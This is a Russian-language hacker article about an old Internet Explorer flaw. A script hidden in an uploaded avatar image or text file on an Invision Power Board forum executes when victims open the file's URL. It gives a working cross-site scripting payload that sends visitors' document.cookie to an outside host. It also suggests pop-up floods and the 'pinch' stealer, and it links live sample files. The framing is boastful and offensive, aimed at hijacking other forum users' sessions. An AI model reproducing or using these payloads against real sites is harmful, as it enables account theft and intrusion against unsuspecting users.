Привет, вы когда-нибудь слышали об уязвимостях jpg или gif?
Да!- скажите вы. Но об уязвимости при обработке в txt вы и не мечтали.
Тогда эта статья для вас.
Недавно загорелся идеей вставить свой скрипт в форум
(Invision Power Board (U) v1.3 Final), через аватар
(многие об этом мечтали =) ). Долго я бился с форумом и все впустую,
форум так просто не сдавался! Немного поразмыслив я решил
попробовать создать файл со скриптом <script>alert("Hacked")</script> и
сохранить в jpg. При загрузке изображения в аватар на форуме ничего из
того что я ожидал не произошло =( . Тогда я решил посмотреть на свою
картинку (аватар) напрямую, через URL: открыл контекстное меню =>
свойства=> получил адрес картинки на форуме, т.е. в той области
форума в которую она загружалась
http://www.emu-land.net/forum/uploads/av-552.gif
И что бы вы думали? О-ля-ля, вот сюрприз - скрипт сработал =)
Я попробовал этот фокус с gif - скрипт тоже работал. Как я понял позже,
IE при загрузке картинки на сайт через тег <img> не обрабатывает ее, если в
ней есть скрипт, воспринимает как ошибку, т.к. IE ожидает изображение!
Но при загрузке напрямую в URL, IE ориентируется на синтаксис и =>
скрипт работает =)
Ну и что, что работает, что особенного это нам дает ?
А вот что!
Как часто вы переходите по ссылкам в форуме, особенно если они
имеют вид
http://hacker.narod.ru ? Вот и я, честно говоря не особенно
доверяю, но а как часто вы переходите из топика в топик на форуме?
То та =)
Адрес картинки ,а в ней может быть что угодно, будет иметь локальный адрес
т.е. если адрес форума
www.site.ru/forum , то адрес картинки будет
www.site.ru/forum/uploads/gif.jpg (в разных форумах по-разному!). Все что
вам остается это дать эту ссылку кому-нибудь на форуме, представим что в
картинке такой скрипт <script>img = new Image();
img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> или другой
любой сниффер вы получаете в свое пользование cookie почти любого
пользователя. Да и вообще используя эту технолоию, а как оказалось
скрипты срабатывают даже в txt, можно под видом безобидного файла
(txt, gif, jpg(jpeg)) запустить скрипт: 1) бесконечные окна
http://foranti.narod.ru/zlieokna.jpg
(будьте осторожны) 2) Использовать pinch (см. видео античат) 3)Похищение
cookie 4) Ваше воображение вам подскажет =)
Данная уязвимость была протестирована на Firefox 1.0, на что он злобно
выругался:"Изображение “
http://foranti.narod.ru/1.jpg” не может быть
показано, так как содержит ошибки."
Opera 8.0 , тож... не работает =(
Но учитывая тот факт что от 60-90% пользователей сидят под IE можно
смело идти в бой =)
Так что с милой улыбкой на лице передадим Билли привет =)
Microsoft как всегда на высоте =)
Вот еще примеры:
http://foranti.narod.ru/1.txt
http://foranti.narod.ru/1.gif
http://foranti.narod.ru/1.jpg
Хочу поблагодарить White Jordan, ведь именно он подталкнул меня на то, чтоб еще раз покапаться с аватарой! =)))